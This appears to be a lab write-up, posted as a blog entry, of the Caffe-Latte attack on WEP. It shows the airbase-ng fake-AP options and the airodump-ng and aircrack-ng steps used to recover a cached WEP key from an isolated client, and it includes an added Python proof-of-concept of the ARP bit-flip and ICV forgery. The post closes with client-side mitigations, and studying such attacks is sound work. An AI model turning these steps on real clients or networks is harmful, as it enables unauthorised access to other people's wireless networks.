Monday, October 17, 2016


3.3 - Caffe-Latte attack against WEP

- The Caffe-Latte attack takes advantage of WEP's message modification flaw. Its most interesting characteristic is that no legitimate AP is needed to perform it: the attacker obtains the material used to crack the WEP key from packets sent by the victim while it tries to connect to an AP that is not actually present. The attacker "kali" monitors the air looking for clients sending probe requests. Then a fake AP is set up with airbase-ng. When the client connects to the fake AP, authentication and association messages are exchanged, and after association the DHCP request phase starts. Just at this point, the Caffe-Latte attack is launched by the attacker.

- To perform this attack, let's set up the legitimate AP with SSID=prueba and WEP with Shared Key Authentication:

The WEP key generated by the AP is A8925DC44A5432DE814CE109F9:

The victim "roch" is connected to the wireless network, so that it caches and stores the WEP key:

This attack is based on the fact that clients, just after being started, are usually configured to send probe requests for SSIDs they have previously connected to. For instance, Windows clients cache and store the WEP keys of previously connected networks. This list is known as the Preferred Network List (PNL), a list of previously used networks. A very similar configuration exists on Linux; for instance, on Debian previously used networks are stored under the Network Connections option.

- Every time a client connects to the same AP, the Windows wireless manager automatically uses that stored key. This is done for the user's convenience, so that the key does not need to be entered every time the computer is turned on.

- However, from the security perspective, this can be considered a flaw. It can be seen in the next screenshot that the option "Connect automatically when this network is in range" is ticked:

- As said before, the WEP key is cached and stored by Windows clients:

- Because this attack does not require the client to be close to the legitimate AP, the WEP key can be cracked using just the isolated client. To verify it, the AP is going to be unplugged during the whole practice, simulating that the AP is far away from the client.

- Now, given this scenario, let's start the attack from "kali". Using the airbase-ng tool, a fake AP is created with the same SSID=prueba and an arbitrary MAC address like AA:AA:AA:AA:AA:AA. Of course, in a real attack a less suspicious MAC address would be used:

It is important to notice the options used with the airbase-ng command:

                      -L = Caffe-Latte attack
                      -W 1 = set the WEP flag in the beacons, so the fake AP advertises WEP encryption

- Then, the client "roch" is started in a scenario where there is no legitimate AP turned on (remember that it has been unplugged). Wireshark detects the victim "roch" (Netgear wireless card with MAC 28:C6:8E:63:15:6B) desperately sending broadcast probe requests looking for the legitimate "prueba" AP, which is actually unplugged:

- The victim "roch" will not find the legitimate "prueba" AP, but the fake "prueba" AP created by the attacker "kali".

Because there is no mutual authentication between client and AP (only the client authenticates to the AP), nothing prevents the association process from succeeding. In other words, the fake AP (the attacker) has the role of deciding or approving whether the client's association is accepted. It is quite interesting that WEP allows any fake AP to complete the association process without knowing the key in use.

Once the client is connected to the fake AP, it sends out DHCP requests, which eventually time out because the fake AP is not a DHCP server. Then, not having received a dynamic IP, the client falls back to Automatic Private IP Addressing (APIPA) and assigns itself an address in 169.254.x.x. After this auto-configuration, the client sends gratuitous ARP broadcast packets to announce itself to the rest of the network.

- The attacker "kali" captures these gratuitous ARP packets and modifies them using the WEP message modification flaw, turning them into ARP requests addressed to the client. The flaw exists because WEP's integrity check (ICV) is a plain CRC-32, which is linear: an attacker can flip chosen bits of a WEP-encrypted packet and adjust the encrypted ICV accordingly, so the modified packet is still accepted as valid without knowing the key or the plaintext.

- Then the fake AP sends a few thousand of these spurious ARP request packets back into the wireless network. The client receives them and believes that someone is asking for its MAC address via ARP, so it replies.

- Each reply from the victim "roch" is a frame encrypted under the cached WEP key with a fresh IV, and the attacker "kali" captures them. Once the attacker has collected enough of these packets, aircrack-ng can recover the WEP key from them.

- It is important to note that the attacker is able to run the attack without any knowledge of the WEP key.
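To make the message modification step concrete, here is an added example in Python (not code from the original post or from the aircrack-ng project). The victim side encrypts a gratuitous ARP with the WEP key from the post and checks the ICV on receipt; the attacker side, which never sees the key or the plaintext values, flips bits of the encrypted sender MAC and sender IP and repairs the encrypted ICV using the linearity of CRC-32, which is what makes the flipped frame pass the victim's integrity check. The IV, the APIPA address 169.254.10.20 and the choice of which bytes to flip are assumptions; the unencrypted 802.11 header, which the fake AP rewrites when it re-injects the frame, and the key-ID byte after the IV are left out.

```python
import struct
import zlib

# Constructed lab values. The WEP key and the victim MAC are the ones reported
# in the post; the IV, the APIPA address and the flipped byte positions are
# assumptions made for this example.
WEP_KEY = bytes.fromhex("A8925DC44A5432DE814CE109F9")   # 104-bit key from the post
VICTIM_MAC = bytes.fromhex("28C68E63156B")              # "roch", from the post
VICTIM_IP = bytes([169, 254, 10, 20])                    # assumed APIPA address
IV = b"\x11\x22\x33"                                     # assumed 24-bit WEP IV

SNAP_ARP = bytes.fromhex("AAAA030000000806")             # LLC/SNAP header, EtherType 0x0806
# Offsets of the ARP fields inside the plaintext body (8-byte SNAP + ARP header).
OPCODE, SENDER_MAC, SENDER_IP, TARGET_MAC, TARGET_IP = 14, 16, 22, 26, 32

def rc4(key: bytes, n: int) -> bytes:
    """n bytes of RC4 keystream for key (KSA followed by PRGA)."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

def icv(data: bytes) -> bytes:
    """WEP integrity check value: plain CRC-32 of the plaintext, little-endian."""
    return struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF)

def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Victim side: body = IV || RC4(IV || key) XOR (plaintext || ICV)."""
    ks = rc4(iv + key, len(plaintext) + 4)
    return iv + bytes(a ^ b for a, b in zip(plaintext + icv(plaintext), ks))

def wep_decrypt(key: bytes, body: bytes):
    """Victim side: decrypt and report whether the ICV still matches."""
    iv, ct = body[:3], body[3:]
    pt = bytes(a ^ b for a, b in zip(ct, rc4(iv + key, len(ct))))
    data, tag = pt[:-4], pt[-4:]
    return data, tag == icv(data)

def build_gratuitous_arp(mac: bytes, ip: bytes) -> bytes:
    """Gratuitous ARP as the client announces itself after APIPA: an ARP
    request whose sender IP and target IP are both the client's own."""
    header = struct.pack("!HHBBH", 1, 0x0800, 6, 4, 1)   # Ethernet, IPv4, request
    return SNAP_ARP + header + mac + ip + bytes(6) + ip

def parse_arp(data: bytes) -> dict:
    return {
        "opcode": struct.unpack("!H", data[OPCODE:OPCODE + 2])[0],
        "sender_mac": data[SENDER_MAC:SENDER_MAC + 6],
        "sender_ip": data[SENDER_IP:SENDER_IP + 4],
        "target_mac": data[TARGET_MAC:TARGET_MAC + 6],
        "target_ip": data[TARGET_IP:TARGET_IP + 4],
    }

def caffe_latte_flip(body: bytes, fix_icv: bool = True) -> bytes:
    """Attacker side: knows neither the key nor the plaintext values, only the
    layout. XOR a difference D into the encrypted sender MAC and sender IP so
    the frame becomes an ARP request from another host for the victim's IP,
    then repair the encrypted ICV using CRC-32 linearity:
        crc(P ^ D) == crc(P) ^ crc(D) ^ crc(0...0)
    so XORing crc(D) ^ crc(zeros) into the encrypted ICV keeps it valid."""
    iv, ct = body[:3], bytearray(body[3:])
    n = len(ct) - 4                       # plaintext length, ICV excluded
    delta = bytearray(n)
    delta[SENDER_MAC + 5] ^= 0x01         # alter the last byte of the sender MAC
    delta[SENDER_IP + 3] ^= 0x01          # alter the last octet of the sender IP
    for k in range(n):
        ct[k] ^= delta[k]
    if fix_icv:
        adjust = (zlib.crc32(bytes(delta)) ^ zlib.crc32(bytes(n))) & 0xFFFFFFFF
        ct[n:] = bytes(a ^ b for a, b in zip(ct[n:], struct.pack("<I", adjust)))
    return iv + bytes(ct)

def demo():
    """Encrypt the victim's gratuitous ARP, let the attacker flip it, and
    decrypt it again as the victim would on receipt."""
    body = wep_encrypt(WEP_KEY, IV, build_gratuitous_arp(VICTIM_MAC, VICTIM_IP))
    data, ok = wep_decrypt(WEP_KEY, caffe_latte_flip(body))
    return ok, parse_arp(data)

if __name__ == "__main__":
    ok, arp = demo()
    print("ICV valid after bit flip:", ok)
    print("ARP request for", ".".join(map(str, arp["target_ip"])),
          "now comes from", ":".join(f"{b:02x}" for b in arp["sender_mac"]),
          ".".join(map(str, arp["sender_ip"])))
```

Run it directly to see the flipped frame decrypt with a valid ICV as an ARP request for the victim's own address from a different sender. Calling `caffe_latte_flip(body, fix_icv=False)` shows the failure mode: the same bit flips without the CRC adjustment produce a frame the client silently drops, which is why the ICV repair, not the flip itself, is the heart of the attack.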

- Two minutes after the attacker "kali" created the fake AP, the victim "roch" associates, and the Caffe-Latte attack is launched immediately afterwards (see the last line) at 10:52:51:

In order to collect the packets exchanged between the victim "roch" and the fake AP, airodump-ng writes to the file prefix CaffeLatteWEP:

- The CaffeLatteWEP-01 capture file and its companion files are created:

- After some minutes of gathering a large number of exchanged packets, aircrack-ng is used to obtain the WEP key A8925DC44A5432DE814CE109F9:

- Again, it is important to remember the most remarkable feature of this attack, which differentiates it from other WEP attacks and gives it its great value: no legitimate AP has been used to perform the whole attack, and no legitimate AP has been present in the vicinity. Just the isolated client, maybe roaming thousands of miles away from the attacked network, looking for a wireless connection and sending frames over the air encrypted with the cached and stored WEP key, which is all the attacker needs. So, unlike other attacks against WEP encryption, the attacker does not need to be in the vicinity of any AP, which makes Caffe-Latte a very powerful attack.

- Needless to say, the client-side mitigation for this attack would consist of removing all WEP networks from the Preferred Network List (PNL), or at least disabling automatic connection to them, whenever the client is roaming. However, almost nobody does it, because of the inconvenience created every time the user wants to join the network again: the WEP key would have to be entered manually, and it is usually a very long hexadecimal key that is difficult to remember. The real fix is not to rely on WEP at all, since the key can be recovered from the client's traffic regardless of where the client is.